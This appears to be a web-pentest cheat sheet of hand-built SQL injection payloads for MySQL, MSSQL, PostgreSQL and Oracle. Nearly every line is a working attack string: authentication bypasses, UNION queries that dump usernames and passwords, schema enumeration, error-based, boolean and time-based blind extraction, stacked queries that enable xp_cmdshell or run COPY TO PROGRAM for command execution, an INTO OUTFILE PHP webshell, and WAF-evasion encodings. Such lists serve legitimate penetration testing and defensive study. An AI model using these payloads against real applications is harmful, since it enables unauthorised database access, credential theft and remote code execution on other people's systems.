web-pentest
SQL Injection — Manual Payloads
Hand-built SQL injection payloads — auth bypass, UNION extraction, schema enum, error/blind/time-based, stacked-query RCE and WAF bypasses across MySQL, MSSQL, PostgreSQL and Oracle.
Detection & Auth Bypass (6)
' OR '1'='1
Classic always-true authentication bypass
' OR 1=1-- -
Comment out the rest of the query
admin'-- -
Log in as a known user, comment the password check
") OR ("1"="1
Break out of a double-quote + parenthesis context
' OR 1=1#
MySQL hash-comment variant
'+OR+'x'='x
URL-friendly always-true
UNION-Based Extraction (6)
' ORDER BY 5-- -
Find the column count (increment until it errors)
' UNION SELECT NULL,NULL,NULL-- -
Match the column count with NULLs
' UNION SELECT 1,2,3-- -
Identify which columns are reflected
' UNION SELECT NULL,@@version,NULL-- -
Leak DB version (MySQL/MSSQL)
' UNION SELECT username,password,3 FROM users-- -
Dump credentials
' UNION SELECT NULL,group_concat(username,0x3a,password),NULL FROM users-- -
Concatenate all creds into one row (MySQL)
Schema Enumeration (5)
' UNION SELECT table_name,2,3 FROM information_schema.tables-- -
List all tables
' UNION SELECT column_name,2,3 FROM information_schema.columns WHERE table_name='users'-- -
List columns of a table
' UNION SELECT schema_name,2,3 FROM information_schema.schemata-- -
List databases (MySQL)
' UNION SELECT banner,2,3 FROM v$version-- -
Oracle version banner
' UNION SELECT string_agg(table_name,','),2,3 FROM information_schema.tables-- -
List tables (PostgreSQL)
Error-Based (4)
' AND extractvalue(1,concat(0x7e,(SELECT @@version)))-- -
MySQL error-based leak (extractvalue)
' AND updatexml(1,concat(0x7e,(SELECT user())),1)-- -
MySQL error-based leak (updatexml)
' AND 1=convert(int,(SELECT @@version))-- -
MSSQL error-based type-cast leak
' AND 1=cast((SELECT version()) as int)-- -
PostgreSQL error-based cast leak
Blind — Boolean & Time (7)
' AND 1=1-- -
Boolean TRUE baseline
' AND 1=2-- -
Boolean FALSE baseline (diff the responses)
' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='a'-- -
Extract data one character at a time
' AND SLEEP(5)-- -
MySQL time-based delay
' OR IF(1=1,SLEEP(5),0)-- -
MySQL conditional time delay
'; WAITFOR DELAY '0:0:5'-- -
MSSQL time-based delay
' AND 1=(SELECT 1 FROM PG_SLEEP(5))-- -
PostgreSQL time-based delay
Stacked Queries & RCE (4)
'; EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE-- -
Enable xp_cmdshell on MSSQL
'; EXEC xp_cmdshell 'whoami'-- -
Run an OS command via MSSQL
'; COPY (SELECT '') TO PROGRAM 'id'-- -
PostgreSQL command exec via COPY TO PROGRAM
' UNION SELECT '<?php system($_GET[0]);?>',2,3 INTO OUTFILE '/var/www/html/s.php'-- -
MySQL write a webshell (needs FILE priv + writable path)
WAF / Filter Bypass (6)
' /*!50000UNION*/ /*!50000SELECT*/ 1,2,3-- -
MySQL versioned-comment keyword bypass
' UnIoN sElEcT 1,2,3-- -
Mixed-case keyword bypass
'/**/OR/**/1=1-- -
Inline comments instead of spaces
'%09OR%091=1-- -
Tab (%09) used as whitespace
' UNION ALL SELECT 1,2,3-- -
ALL keyword to dodge "UNION SELECT" signatures
%2527%2520OR%25201=1
Double URL-encoded ' OR 1=1
Related Articles
5
Web Hacking
JSON and YAML Unsafe Deserialization
Deep technical analysis of insecure deserialization across Java, PHP, Python, and Node.js …
Web Hacking
Supply Chain Attacks
Deep technical guide to software supply chain attacks — dependency confusion, malicious np…
Web Hacking
Cross-Site Scripting Mastery
Complete XSS guide covering all attack types, filter bypasses, CSP evasion, cookie stealin…
Web Hacking
File Upload to RCE
Complete file upload exploitation guide — MIME bypass, double extension tricks, polyglot J…
Web Hacking
Advanced SSRF
Complete SSRF exploitation guide — AWS IMDSv1/v2 credential theft, GCP/Azure metadata, bli…
